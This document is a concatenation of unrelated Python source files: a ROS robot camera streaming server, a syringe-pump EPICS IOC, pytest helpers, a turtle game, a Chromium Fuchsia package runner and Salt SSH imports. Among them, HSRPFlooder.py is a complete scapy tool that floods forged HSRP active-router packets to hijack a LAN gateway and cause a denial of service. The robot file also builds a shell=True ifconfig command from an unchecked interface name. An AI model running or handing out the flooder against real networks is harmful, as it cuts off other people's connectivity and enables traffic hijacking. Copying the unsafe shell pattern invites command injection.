# self.camera.draw_power2(frame, "AAA")
elif display_config == 1:
overlay_lib.drawCrosshair(
frame, self.frame_shape[1], self.frame_shape[0]
)
elif display_config == 2:
continue
ret, jpg = cv2.imencode(".jpg", frame)
if take_snapshot:
self.save_snapshot(jpg)
take_snapshot = False
# jpg = self.camera.read_in_jpeg(SLEEP_IN_SEC, 1 / diff_fps)
if jpg is None:
continue
self.wfile.write("--jpgboundary".encode())
self.send_header("Content-type", "image/jpeg")
self.send_header("Content-length", str(jpg.nbytes))
self.end_headers()
self.wfile.write(jpg)
endtime_fps = time.time()
diff_fps = endtime_fps - start_fps
elif self.path == URL_PATH_FAVICON:
self.send_response(404)
self.end_headers()
self.wfile.write("favicon is not found".encode())
else:
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
with open(self.document_root + "/index.html", "r") as f:
self.wfile.write(f.read().encode())
logger.info("thread is stopping ... [{path}]".format(path=self.path))
import threading
class ButtonH(threading.Thread):
def __init__(self, pin, func):
super().__init__(daemon=True)
self.func = func
self.pin = pin
self.lastpinval = self.pin
self.lock = threading.Lock()
def __call__(self, *args):
if not self.lock.acquire(blocking=False):
return
t = threading.Timer(self.bouncetime, self.read, args=args)
t.start()
print("self.pin")
def read(self, *args):
print(self.pin)
# pinval = self.pin
# print(self.pin)
# if (
# (pinval == 0 and self.lastpinval == 1)
# and (self.edge in ["falling", "both"])
# ) or (
# (pinval == 1 and self.lastpinval == 0) and (self.edge in ["rising", "both"])
# ):
# print(self.pin)
#
# # self.func(*args)
#
# self.lastpinval = pinval
# self.lock.release()
class ButtonHandler(threading.Thread):
def __init__(self, pin, func, edge="both", bouncetime=500):
super().__init__(daemon=True)
self.edge = edge
self.func = func
self.pin = pin
self.bouncetime = float(bouncetime) / 1000
self.lastpinval = self.pin
self.lock = threading.Lock()
def __call__(self, *args):
if not self.lock.acquire(blocking=False):
return
print("Call")
t = threading.Timer(self.bouncetime, self.read, args=args)
t.start()
def read(self, *args):
pinval = self.pin
print(self.pin)
if (
(pinval == 0 and self.lastpinval == 1)
and (self.edge in ["falling", "both"])
) or (
(pinval == 1 and self.lastpinval == 0) and (self.edge in ["rising", "both"])
):
print(self.pin)
# self.func(*args)
self.lastpinval = pinval
self.lock.release()
class Robot_Info(Node):
def __init__(self):
super().__init__("robot_info")
self.joy_topic = self.create_subscription(Joy, "joy", self.joy_topic, 10)
# self.move_topic = self.create_subscription(String, "in", self.joy_topic, 10)
self.CPU_topic = self.create_subscription(
String, "info_sys_CPU", self.CPU_topic, 10
)
self.power_topic = self.create_subscription(
String, "info_sys_power", self.power_topic, 10
)
self.imu_topic = self.create_subscription(Imu, "/imu", self.imu_topic, 10)
self.temp_topic = self.create_subscription(
Temperature, "/temp", self.temp_topic, 10
)
self.press_topic = self.create_subscription(
FluidPressure, "/press", self.press_topic, 10
)
self.init_buttons = True
def imu_topic(self, msg):
global euler
euler = euler_from_quaternion(
msg.orientation.x,
msg.orientation.y,
msg.orientation.z,
msg.orientation.w,
False,
1,
)
def temp_topic(self, msg):
global temp
temp = round(msg.temperature, 1)
def press_topic(self, msg):
global alt
alt = int(get_altitude(msg.fluid_pressure))
def power_topic(self, msg):
global power_info
power_info = msg.data
def power_topic(self, msg):
global power_info
power_info = msg.data
def CPU_topic(self, msg):
global CPU_info
CPU_info = msg.data
def take_snapshot(self, argum="N/A"):
global take_snapshot
take_snapshot = True
# print("SNAP!!!!" + str(argum))
def change_view(self):
global display_config
print(display_config)
if display_config >= 3:
display_config = 0
else:
display_config += 1
def joy_topic(self, msg):
global x, y, display_config
x = round(msg.axes[0], 1)
y = round(msg.axes[1], 1)
display_change_button = msg.buttons[9]
if display_change_button == 1:
self.change_view()
# if self.display_config >= 3:
# self.display_config = 0
# else:
# self.display_config += 1
# if self.init_buttons == True:
# # self.cb = ButtonHandler(msg.buttons[5], self.take_snapshot, ["kmkmkm"])
# self.init_buttons = False
# if self.init_buttons == False:
# try:
# self.cb.read(msg.buttons[5])
# except Exception:
# print("ERROR: " + str(Exception))
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
def set_camera(self, camera):
self.camera = camera
def get_camera(self):
return self.camera
def set_document_root(self, document_root):
self.document_root = document_root
def get_document_root(self):
return self.document_root
# Probably better to define either a message or a common library
import subprocess
def get_ip_address(interface):
cmd = (
"ifconfig %s | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*' | grep -v '127.0.0.1'"
% interface
)
return subprocess.check_output(cmd, shell=True).decode("ascii")[:-1]
import math
G_TO_MPSS = 9.80665
def get_altitude(pressure: float, sea_level_hPa: float = 1013.25) -> float:
"""
the conversion uses the formula:
h = (T0 / L0) * ((p / P0)**(-(R* * L0) / (g0 * M)) - 1)
where:
h = height above sea level
T0 = standard temperature at sea level = 288.15
L0 = standard temperatur elapse rate = -0.0065
p = measured pressure
P0 = static pressure = 1013.25
g0 = gravitational acceleration = 9.80665
M = mloecular mass of earth's air = 0.0289644
R* = universal gas constant = 8.31432
Given the constants, this works out to:
h = 44330.8 * (1 - (p / P0)**0.190263)
Arguments:
pressure {float} -- current pressure
sea_level_hPa {float} -- The current hPa at sea level.
Returns:
[type] -- [description]
"""
return 44330.8 * (1 - pow(pressure / sea_level_hPa, 0.190263))
def compute_sea_level(altitude: float, atmospheric: float) -> float:
"""
Calculates the pressure at sea level (in hPa) from the specified altitude
(in meters), and atmospheric pressure (in hPa).
# Equation taken from BMP180 datasheet (page 17):
# http://www.adafruit.com/datasheets/BST-BMP180-DS000-09.pdf
Args:
altitude : Altitude in meters
atmospheric : Atmospheric pressure in hPa
Return:
float The approximate pressure
"""
return atmospheric / pow(1.0 - (altitude / 44330.0), 5.255)
def euler_from_quaternion(x, y, z, w, rad=False, approx=1):
"""
Convert a quaternion into euler angles (roll, pitch, yaw)
roll is rotation around x in radians (counterclockwise)
pitch is rotation around y in radians (counterclockwise)
yaw is rotation around z in radians (counterclockwise)
"""
t0 = +2.0 * (w * x + y * z)
t1 = +1.0 - 2.0 * (x * x + y * y)
roll_x = math.atan2(t0, t1)
t2 = +2.0 * (w * y - z * x)
t2 = +1.0 if t2 > +1.0 else t2
t2 = -1.0 if t2 < -1.0 else t2
pitch_y = math.asin(t2)
t3 = +2.0 * (w * z + x * y)
t4 = +1.0 - 2.0 * (y * y + z * z)
yaw_z = math.atan2(t3, t4)
if not rad:
roll_x = round(math.degrees(roll_x), approx)
pitch_y = round(math.degrees(pitch_y), approx)
yaw_z = round(math.degrees(yaw_z), approx)
return roll_x, pitch_y, yaw_z # in radians
def main(args=None):
rclpy.init()
parser = argparse.ArgumentParser()
parser.add_argument("--bind", type=str, default=get_ip_address("wlan0"))
parser.add_argument("--port", type=int, default=8080)
parser.add_argument("--width", type=int, default=640)
parser.add_argument("--height", type=int, default=480)
parser.add_argument("--directory", type=str, default="html")
parser.add_argument("--device", type=str, default="jetson")
args = parser.parse_args()
# The parameter "--device" can be integer 0, 1, 2 etc or a string if tis is "jetson" we wil use the jetson caemra as capture device
camera = Camera(args.device, args.width, args.height)
try:
server = ThreadedHTTPServer((args.bind, args.port), CameraHandler)
server.set_camera(camera)
server.set_document_root(args.directory)
logger.info("server started")
thread2 = threading.Thread(target=server.serve_forever)
thread2.start()
r_info = Robot_Info()
# server.serve_forever()
# Setup and start the thread to read serial port r_info = Robot_Info()
thread_lock = Lock()
# thread = threading.Thread(target=rclpy.spin, args=(server))
thread = threading.Thread(target=rclpy.spin(r_info))
thread.start()
except KeyboardInterrupt:
logger.info("server is stopping ...")
camera.release()
server.shutdown()
# Destroy the node explicitly
# (optional - otherwise it will be done automatically
# when the garbage collector destroys the node object)
r_info.destroy_node()
rclpy.shutdown()
if __name__ == "__main__":
main()
|
device_io.py
|
#!/usr/bin/env python3
import sys
import os
import threading
import atexit
import time
from datetime import datetime
import itertools
from logging import debug,info,warn,error
#Input/Output server library
from caproto.server import pvproperty, PVGroup, ioc_arg_parser, run
from ubcs_auxiliary.threading import new_thread
from numpy import zeros, random, nan
class Server(PVGroup):
RBV = pvproperty(value=nan, units = 'uL', read_only = True, precision = 3)
VAL = pvproperty(value=nan,
units = 'uL',
precision = 3,
upper_ctrl_limit=250.0,
lower_ctrl_limit=0.0,)
VELO = pvproperty(value=nan,
units = 'uL/s',
precision = 3,
upper_ctrl_limit=68.0,
lower_ctrl_limit=0.001)
VALVE = pvproperty(value='', dtype=str, max_length=2)
CMD = pvproperty(value='', max_length=1000, dtype=str)
ACK = pvproperty(value='', max_length=1000, dtype=str, read_only = True)
#MOVN",value = self.moving)
#ERROR
#ERROR_CODE
STATUS = pvproperty(value='unknown', max_length=10, dtype=str, read_only = True)
device = None
# NOTE the decorator used here:
@RBV.startup
async def RBV(self, instance, async_lib):
# This method will be called when the server starts up.
debug('* request method called at server startup')
self.io_get_queue = async_lib.ThreadsafeQueue()
self.io_put_queue = async_lib.ThreadsafeQueue()
self.device.io_put_queue = self.io_put_queue
self.device.io_get_queue = self.io_get_queue
# Loop and grab items from the response queue one at a time
while True:
value = await self.io_put_queue.async_get()
debug(f'Got put request from the device: {value}')
if 'RBV' in list(value.keys()):
await self.RBV.write(value['RBV'])
elif 'VAL' in list(value.keys()):
await self.VAL.write(value['VAL'])
elif 'VELO' in list(value.keys()):
await self.VELO.write(value['VELO'])
elif 'VALVE' in list(value.keys()):
await self.VALVE.write(value['VALVE'])
#@VAL.startup
#async def VAL(self, instance, async_lib):
# self.VAL.value = self.device.get_cmd_position()
@VAL.putter
async def VAL(self, instance, value):
print('Received update for the {}, sending new value {}'.format('VAL',value))
await self.device_ioexecute(pv_name = 'VAL', value = float(value))
return value
@VELO.putter
async def VELO(self, instance, value):
print('Received update for the {}, sending new value {}'.format('VELO',value))
await self.device_ioexecute(pv_name = 'VELO', value = float(value))
return value
@VALVE.putter
async def VALVE(self, instance, value):
print('Received update for the {}, sending new value {}'.format('VALVE',value))
await self.device_ioexecute(pv_name = 'VALVE', value = value)
return value
@CMD.putter
async def CMD(self, instance, value):
print('Received update for the {}, sending new value {}'.format('CMD',value))
await self.device_ioexecute(pv_name = 'CMD', value = value)
return value
async def device_ioexecute(self, pv_name, value):
"""
"""
if self.device is not None:
self.device.ioexecute(pv_name = pv_name, value = value)
async def device_ioread(self, pv_name, value):
"""
"""
pass
def update_pvs(self):
"""
Force update of all PVs. Works only if self.device is assigned. If None, nothing will happen.
"""
if self.device is not None:
pass
else:
pass
class Device_IO(object):
def __init__(self, pump_id, prefix = ''):
"""
"""
from syringe_pump.device import Device
import sys
if pump_id == 1 or pump_id == 3:
orientation = 'Y'
elif pump_id == 2 or pump_id == 4:
orientation = 'Z'
pump = Device()
pump.init(pump_id,0.1,100,orientation,250)
pump.start()
from tempfile import gettempdir
import logging
filename=gettempdir()+f'/syringe_pump_device_io_{pump_id}.log'
print(filename)
logging.basicConfig(filename=filename,
level=logging.DEBUG,
format="%(asctime)s %(levelname)s %(module)s.%(funcName)s: %(message)s")
debug('test write debug')
ioc_options, run_options = ioc_arg_parser(
default_prefix=prefix+ 'SYRINGE'+str(pump_id) + '.',
desc='Run an IOC that does blocking tasks on a worker thread.')
ioc = Server(**ioc_options)
ioc.device = pump
run(ioc.pvdb, **run_options)
def run_ioc(pump_id = 2):
from syringe_pump import device_io
import multiprocessing
p = multiprocessing.Process(target=device_io.Device_IO,args=(pump_id,'TEST:'))
p.start()
return p
if __name__ == '__main__':
pump_id = 1
from syringe_pump.device import Device
import sys
if pump_id == 1 or pump_id == 3:
orientation = 'Y'
elif pump_id == 2 or pump_id == 4:
orientation = 'Z'
pump = Device()
pump.init(pump_id,0.1,100,orientation,250)
pump.start()
from tempfile import gettempdir
import logging
logfile = gettempdir()+f'/syringe_pump_device_io_{str(pump_id)}.log'
logging.basicConfig(level=logging.DEBUG,
format="%(asctime)s %(levelname)s %(module)s.%(funcName)s: %(message)s",
filename=logfile,
)
debug('test write debug')
ioc_options, run_options = ioc_arg_parser(
default_prefix=f'TEST:SYRINGE{str(pump_id)}.',
desc='Run an IOC that does blocking tasks on a worker thread.')
ioc = Server(**ioc_options)
ioc.device = pump
ioc.update_pvs()
#This is were start_up happens!
run(ioc.pvdb, **run_options)
|
HSRPFlooder.py
|
#!/usr/bin/python
#
# Proof-of-concept HSRP Active router Flooder triggering outbound gateway Denial of Service. Not fully tested, not working stabily at the moment.
#
# Python requirements:
# - scapy
#
# Mariusz Banach / mgeeky, '18, <mb@binary-offensive.com>
#
import sys
import struct
import string
import random
import argparse
import multiprocessing
import socket
import fcntl
import struct
try:
from scapy.all import *
except ImportError:
print('[!] Scapy required: pip install scapy')
sys.exit(1)
VERSION = '0.1'
config = {
'verbose' : False,
'interface' : None,
'processors' : 1,
# HSRP Fields
'group' : 1,
'priority' : 255,
'virtual-ip' : '',
'source-ip' : '',
'dest-ip' : '224.0.0.2',
'auth' : 'cisco\x00\x00\x00',
}
stopThreads = False
#
# ===============================================
#
class Logger:
@staticmethod
def _out(x):
if config['verbose']:
sys.stdout.write(x + '\n')
@staticmethod
def out(x):
Logger._out('[.] ' + x)
@staticmethod
def info(x):
Logger._out('[?] ' + x)
@staticmethod
def err(x):
sys.stdout.write('[!] ' + x + '\n')
@staticmethod
def fail(x):
Logger._out('[-] ' + x)
@staticmethod
def ok(x):
Logger._out('[+] ' + x)
def generatePacket():
ip = IP()
ip.src = config['source-ip']
ip.dst = config['dest-ip']
udp = UDP()
udp.sport = 1985
udp.dport = 1985
hsrp = HSRP()
hsrp.version = 0
hsrp.opcode = 1
hsrp.group = config['group']
hsrp.priority = config['priority']
hsrp.virtualIP = config['virtual-ip']
hsrp.auth = config['auth']
hsrppacket = ip / udp / hsrp
return hsrppacket
def flooder(num):
Logger.info('Starting task: {}'.format(num))
while stopThreads != True:
try:
p = generatePacket()
if stopThreads: raise KeyboardInterrupt
send(p, verbose = config['verbose'], iface = config['interface'])
except KeyboardInterrupt:
break
Logger.info('Stopping task: {}'.format(num))
def get_ip_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15])
)[20:24])
def parseOptions(argv):
global config
print('''
:: HSRP Flooding / Denial of Service tool
Floods the interface with Active router Coup HSRP packets.
Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
v{}
'''.format(VERSION))
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')
parser.add_argument('-I', '--interface', metavar='DEV', default='', help='Select interface on which to operate.')
parser.add_argument('-s', '--source', metavar='SRC', default='', help='Specify source IP address. By default: own IP')
parser.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.')
hsrp = parser.add_argument_group('HSRP Fields', 'Specifies contents of interesting HSRP fields in packets to send')
hsrp.add_argument('-g', '--group', help = 'Group number. Default: 1')
hsrp.add_argument('-p', '--priority', help = 'Active router priority. Default: 255')
hsrp.add_argument('-i', '--virtual-ip', dest='virtualip', help = 'Virtual IP of the gateway to spoof.')
hsrp.add_argument('-a', '--auth', help = 'Authentication string. Default: cisco')
args = parser.parse_args()
if not args.interface:
print('[!] Interface option is mandatory.')
sys.exit(-1)
config['verbose'] = args.verbose
config['interface'] = args.interface
#config['processors'] = multiprocessing.cpu_count()
if args.group: config['group'] = args.group
if args.priority: config['priority'] = args.priority
if args.virtualip: config['virtual-ip'] = args.virtualip
if args.auth: config['auth'] = args.auth
if args.source: config['source-ip'] = args.source
else: config['source-ip'] = get_ip_address(config['interface'])
print('Using source IP address: {}'.format(config['source-ip']))
return args
def main(argv):
global stopThreads
opts = parseOptions(argv)
if not opts:
Logger.err('Options parsing failed.')
return False
if os.getuid() != 0:
Logger.err('This program must be run as root.')
return False
jobs = []
for i in range(config['processors']):
task = multiprocessing.Process(target = flooder, args = (i,))
jobs.append(task)
task.daemon = True
task.start()
print('[+] Started flooding on dev: {}. Press CTRL-C to stop that.'.format(config['interface']))
try:
while jobs:
jobs = [job for job in jobs if job.is_alive()]
except KeyboardInterrupt:
stopThreads = True
print('\n[>] Stopping...')
stopThreads = True
time.sleep(3)
if __name__ == '__main__':
main(sys.argv)
|
util_run_multi.py
|
from time import sleep, time
from decorator import FunctionMaker
from logging.handlers import QueueHandler, QueueListener
from typing import List, Tuple, Dict, Any
from machin.parallel.distributed import World, get_world as gw
from machin.parallel.process import Process, ProcessException
import sys
import dill
import pytest
import itertools
import logging
import multiprocessing as mp
import socket
import random
import numpy as np
import torch as t
from contextlib import closing
get_world = gw
# use queue handler
default_logger = logging.getLogger("multi_default_logger")
default_logger.setLevel(logging.INFO)
class SafeExit(Exception):
"""
Raise this if the process needs to be terminated safely while
other processes are still running.
"""
pass
def find_free_port():
# this function is used to find a free port
# since we are using the host network in docker
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind(("localhost", 0))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
def process_main(pipe, log_queue):
handler = logging.handlers.QueueHandler(log_queue)
default_logger.addHandler(handler)
# fix randomness
t.manual_seed(0)
np.random.seed(0)
random.seed(0)
while True:
func, args, kwargs = dill.loads(pipe.recv())
pipe.send(func(*args, **kwargs))
@pytest.fixture(scope="session", autouse=True)
def ctx(pytestconfig):
multiprocess_method = pytestconfig.getoption("multiprocess_method")
assert multiprocess_method in ("forkserver", "spawn",), (
f"Multiprocess starting method must be forkserver or spawn, "
f"but get {multiprocess_method}"
)
if not sys.platform.startswith("linux"):
default_logger.info(
f"Platform {sys.platform} is not linux, use spawn to start processes."
)
multiprocess_method = "spawn"
ctx = mp.get_context(multiprocess_method)
if multiprocess_method == "forkserver":
# preload library to improve testing speed
ctx.set_forkserver_preload(["machin"])
return ctx
@pytest.fixture(scope="function")
def processes(ctx):
pipes = [mp.Pipe(duplex=True) for _ in [0, 1, 2]]
man = ctx.Manager()
queue = man.Queue()
processes = [
Process(target=process_main, args=(pipes[i][0], queue), ctx=ctx)
for i in [0, 1, 2]
]
handler = logging.StreamHandler()
handler.setFormatter(
logging.Formatter("[%(asctime)s] <%(levelname)s>:%(name)s:%(message)s")
)
ql = QueueListener(queue, handler)
ql.start()
default_logger.addHandler(handler)
for p, i in zip(processes, [0, 1, 2]):
default_logger.info(f"processes {i} started")
p.start()
yield processes, [pi[1] for pi in pipes]
for p, pi, i in zip(processes, pipes, [0, 1, 2]):
# try graceful shutdown first
pi[1].send(dill.dumps((exit, 0, {})))
p.join(timeout=1)
if p.is_alive():
# ungraceful shutdown
default_logger.info(f"processes {i} ungraceful shutdown")
p.terminate()
p.join()
default_logger.removeHandler(handler)
ql.stop()
man.shutdown()
man.join()
default_logger.info("processes stopped")
def exec_with_process(
processes, func, args_list, kwargs_list, expected_results, timeout, *pass_through
):
procs, proc_pipes = processes
args_list = args_list if args_list is not None else itertools.repeat([])
kwargs_list = kwargs_list if kwargs_list is not None else itertools.repeat({})
# possibility of port collision using this method still exists
port = find_free_port()
for pi, rank, args, kwargs in zip(proc_pipes, [0, 1, 2], args_list, kwargs_list):
kwargs["_world_port"] = port
pi.send(dill.dumps((func, [rank] + list(args) + list(pass_through), kwargs)))
results = [None, None, None]
finished = [False, False, False]
begin = time()
while not all(finished):
if time() - begin >= timeout:
raise TimeoutError("Run-multi timeout!")
for p, pi, i in zip(procs, proc_pipes, [0, 1, 2]):
try:
p.watch()
except ProcessException as e:
if "SafeExit" in e.args[0]:
return
else:
raise e
if pi.poll(timeout=1e-1):
results[i] = pi.recv()
finished[i] = True
sleep(1e-1)
if expected_results is not None:
assert results == expected_results
def run_multi(
args_list: List[Tuple[Any]] = None,
kwargs_list: List[Dict[str, Any]] = None,
expected_results: List[Any] = None,
pass_through: List[str] = None,
timeout: int = 60,
):
# pass_through allows you to pass through pytest parameters and fixtures
# to the sub processes, these pass through parameters must be placed
# behind normal args and before kwargs
assert args_list is None or len(args_list) == 3
assert kwargs_list is None or len(kwargs_list) == 3
assert expected_results is None or len(expected_results) == 3
if pass_through is None:
pt_args = ""
else:
pt_args = "," + ",".join(pass_through)
def wrapped(func):
return FunctionMaker.create(
f"w_wrapped_func(processes{pt_args})",
f"""
return exec_with_process(
processes, func, args_list, kwargs_list,
expected_results, timeout{pt_args})
""",
dict(
args_list=args_list,
kwargs_list=kwargs_list,
expected_results=expected_results,
timeout=timeout,
func=func,
exec_with_process=exec_with_process,
),
)
return wrapped
def setup_world(func):
def wrapped(rank, *args, _world_port=9100, **kwargs):
# election function for all tests
default_logger.info(f"Initializing world on {rank}")
world = World(world_size=3, rank=rank, name=str(rank))
default_logger.info(f"World initialized on {rank} using port {_world_port}")
result = func(rank, *args, **kwargs)
world.stop()
default_logger.info(f"World stopped on {rank}")
return result
return wrapped
|
app.py
|
import threading
from random import randint, uniform
from playsound import playsound
from turtle import Screen, Turtle, screensize
from utils.alerts import show_alert
from utils.score import update_scoreboard
from intro import start_intro
screen = Screen()
screen.bgcolor('#000000')
screen.bgpic('./assets/background.gif')
screen.title('Space Junk Collector')
screen.delay(0)
# images
screen.addshape('./assets/collector.gif')
screen.addshape('./assets/satellite-1.gif')
# game state
development = False
ready = False
level = 0
score = 0
junk_list = []
junk_speed = 0.1
from collector import Collector, Bullet
player = Collector()
bullet = Bullet()
def create_junk(num_of_junk):
(x, y) = screensize()
for i in range(num_of_junk):
randomX = randint(-x, x)
randomY = randint(-7, y)
randomWidth = uniform(0.5, 1.5)
randomHeight = uniform(0.5, 1.5)
junk = Turtle()
junk.speed(0)
junk.hideturtle()
junk.shape('./assets/satellite-1.gif')
junk.penup()
junk.shapesize(randomWidth, randomHeight)
junk.goto(randomX, randomY)
junk.showturtle()
junk_list.append(junk)
def level_up():
global level, ready, junk_speed
ready = True
level += 1
if level == 1 or development: player.show()
update_scoreboard(score, level)
create_junk(3 * level)
junk_speed += level
if not development: start_intro(level_up)
else: level_up()
# keys
screen.onkeypress(lambda: player.left() if ready else None, 'a')
screen.onkeypress(lambda: player.left() if ready else None, 'Left')
screen.onkeypress(lambda: player.right() if ready else None, 'd')
screen.onkeypress(lambda: player.right() if ready else None, 'Right')
screen.onkey(lambda: bullet.shoot(player.position()) if ready else None, 'w')
screen.onkey(lambda: bullet.shoot(player.position()) if ready else None, 'Up')
screen.onkey(lambda: bullet.shoot(player.position()) if ready else None, 'space')
screen.listen()
# game loop / object collision detection
def game():
global score, level
(player_x, player_y) = player.position()
if bullet.isvisible():
bullet.move()
for index, junk in list(enumerate(junk_list)):
if bullet.collided_with(junk):
junk.clear()
junk.hideturtle()
junk_list.remove(junk)
score += 1
update_scoreboard(score, level)
# play sound
def play_collect_sound():
thread = threading.Thread(
target = lambda: playsound('./assets/audio/collect_sound_effect.mp3', block=False),
name = 'soundThread'
)
thread.start()
play_collect_sound()
if len(junk_list) == 0:
# no more junk, level up!
bullet.destroy()
level_up()
for junk in junk_list:
(screen_x, screen_y) = screensize()
(x, y) = junk.position()
if (abs(x + 10) >= screen_x):
heading = junk.heading()
junk.setheading(180 - heading)
if (abs(x - 10) <= screen_x):
heading = junk.heading()
junk.setheading(-heading)
# consistent speed
mod = ((junk_speed * len(junk_list)) / (junk_speed * 3)) / 10
junk.forward(mod)
screen.ontimer(game, 1)
game()
update_scoreboard(score, level)
screen.update()
screen.mainloop()
|
run_package.py
|
# Copyright 2018 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Contains a helper function for deploying and executing a packaged
executable on a Target."""
from __future__ import print_function
import common
import hashlib
import logging
import multiprocessing
import os
import re
import select
import subprocess
import sys
import time
import threading
import uuid
from symbolizer import RunSymbolizer
from symbolizer import SymbolizerFilter
FAR = common.GetHostToolPathFromPlatform('far')
# Amount of time to wait for the termination of the system log output thread.
_JOIN_TIMEOUT_SECS = 5
def _AttachKernelLogReader(target):
"""Attaches a kernel log reader as a long-running SSH task."""
logging.info('Attaching kernel logger.')
return target.RunCommandPiped(['dlog', '-f'], stdin=open(os.devnull, 'r'),
stdout=subprocess.PIPE)
def _BuildIdsPaths(package_paths):
"""Generate build ids paths for symbolizer processes."""
build_ids_paths = map(
lambda package_path: os.path.join(
os.path.dirname(package_path), 'ids.txt'),
package_paths)
return build_ids_paths
class SystemLogReader(object):
"""Collects and symbolizes Fuchsia system log to a file."""
def __init__(self):
self._listener_proc = None
self._symbolizer_proc = None
self._system_log = None
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""Stops the system logging processes and closes the output file."""
if self._symbolizer_proc:
self._symbolizer_proc.kill()
if self._listener_proc:
self._listener_proc.kill()
if self._system_log:
self._system_log.close()
def Start(self, target, package_paths, system_log_file):
"""Start a system log reader as a long-running SSH task."""
logging.debug('Writing fuchsia system log to %s' % system_log_file)
self._listener_proc = target.RunCommandPiped(['log_listener'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
self._system_log = open(system_log_file,'w', buffering=1)
self._symbolizer_proc = RunSymbolizer(self._listener_proc.stdout,
self._system_log,
_BuildIdsPaths(package_paths))
class MergedInputStream(object):
"""Merges a number of input streams into a UNIX pipe on a dedicated thread.
Terminates when the file descriptor of the primary stream (the first in
the sequence) is closed."""
def __init__(self, streams):
assert len(streams) > 0
self._streams = streams
self._output_stream = None
self._thread = None
def Start(self):
"""Returns a pipe to the merged output stream."""
read_pipe, write_pipe = os.pipe()
# Disable buffering for the stream to make sure there is no delay in logs.
self._output_stream = os.fdopen(write_pipe, 'w', 0)
self._thread = threading.Thread(target=self._Run)
self._thread.start();
return os.fdopen(read_pipe, 'r')
def _Run(self):
streams_by_fd = {}
primary_fd = self._streams[0].fileno()
for s in self._streams:
streams_by_fd[s.fileno()] = s
# Set when the primary FD is closed. Input from other FDs will continue to
# be processed until select() runs dry.
flush = False
# The lifetime of the MergedInputStream is bound to the lifetime of
# |primary_fd|.
while primary_fd:
# When not flushing: block until data is read or an exception occurs.
rlist, _, xlist = select.select(streams_by_fd, [], streams_by_fd)
if len(rlist) == 0 and flush:
break
for fileno in xlist:
del streams_by_fd[fileno]
if fileno == primary_fd:
primary_fd = None
for fileno in rlist:
line = streams_by_fd[fileno].readline()
if line:
self._output_stream.write(line + '\n')
else:
del streams_by_fd[fileno]
if fileno == primary_fd:
primary_fd = None
# Flush the streams by executing nonblocking reads from the input file
# descriptors until no more data is available, or all the streams are
# closed.
while streams_by_fd:
rlist, _, _ = select.select(streams_by_fd, [], [], 0)
if not rlist:
break
for fileno in rlist:
line = streams_by_fd[fileno].readline()
if line:
self._output_stream.write(line + '\n')
else:
del streams_by_fd[fileno]
def _GetComponentUri(package_name):
return 'fuchsia-pkg://fuchsia.com/%s#meta/%s.cmx' % (package_name,
package_name)
class RunPackageArgs:
"""RunPackage() configuration arguments structure.
symbolizer_config: A newline delimited list of source files contained
in the package. Omitting this parameter will disable symbolization.
system_logging: If set, connects a system log reader to the target.
"""
def __init__(self):
self.symbolizer_config = None
self.system_logging = False
@staticmethod
def FromCommonArgs(args):
run_package_args = RunPackageArgs()
run_package_args.system_logging = args.include_system_logs
return run_package_args
def _DrainStreamToStdout(stream, quit_event):
"""Outputs the contents of |stream| until |quit_event| is set."""
while not quit_event.is_set():
rlist, _, _ = select.select([ stream ], [], [], 0.1)
if rlist:
line = rlist[0].readline()
if not line:
return
print(line.rstrip())
def RunPackage(output_dir, target, package_paths, package_name,
package_args, args):
"""Installs the Fuchsia package at |package_path| on the target,
executes it with |package_args|, and symbolizes its output.
output_dir: The path containing the build output files.
target: The deployment Target object that will run the package.
package_paths: The paths to the .far packages to be installed.
package_name: The name of the primary package to run.
package_args: The arguments which will be passed to the Fuchsia process.
args: Structure of arguments to configure how the package will be run.
Returns the exit code of the remote package process."""
system_logger = (
_AttachKernelLogReader(target) if args.system_logging else None)
try:
if system_logger:
# Spin up a thread to asynchronously dump the system log to stdout
# for easier diagnoses of early, pre-execution failures.
log_output_quit_event = multiprocessing.Event()
log_output_thread = threading.Thread(
target=
lambda: _DrainStreamToStdout(system_logger.stdout, log_output_quit_event)
)
log_output_thread.daemon = True
log_output_thread.start()
with target.GetAmberRepo():
target.InstallPackage(package_paths)
if system_logger:
log_output_quit_event.set()
log_output_thread.join(timeout=_JOIN_TIMEOUT_SECS)
logging.info('Running application.')
command = ['run', _GetComponentUri(package_name)] + package_args
process = target.RunCommandPiped(
command,
stdin=open(os.devnull, 'r'),
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
if system_logger:
output_stream = MergedInputStream(
[process.stdout, system_logger.stdout]).Start()
else:
output_stream = process.stdout
# Run the log data through the symbolizer process.
output_stream = SymbolizerFilter(output_stream,
_BuildIdsPaths(package_paths))
for next_line in output_stream:
print(next_line.rstrip())
process.wait()
if process.returncode == 0:
logging.info('Process exited normally with status code 0.')
else:
# The test runner returns an error status code if *any* tests fail,
# so we should proceed anyway.
logging.warning(
'Process exited with status code %d.' % process.returncode)
finally:
if system_logger:
logging.info('Terminating kernel log reader.')
log_output_quit_event.set()
log_output_thread.join()
system_logger.kill()
return process.returncode
|
__init__.py
|
"""
Create ssh executor system
"""
import base64
import binascii
import copy
import datetime
import getpass
import hashlib
import logging
import multiprocessing
import os
import queue
import re
import subprocess
import sys
import tarfile
import tempfile
import time
import uuid
import salt.client.ssh.shell
import salt.client.ssh.wrapper
import salt.config
import salt.defaults.exitcodes
import salt.exceptions
import salt.loader
import salt.log.setup
import salt.minion
import salt.output
import salt.roster
import salt.serializers.yaml
import salt.state
import salt.utils.args
import salt.utils.atomicfile
import salt.utils.event
import salt.utils.files
import salt.utils.hashutils
import salt.utils.json
import salt.utils.network
import salt.utils.path
import salt.utils.stringutils
import salt.utils.thin
import salt.utils.url
import salt.utils.verify
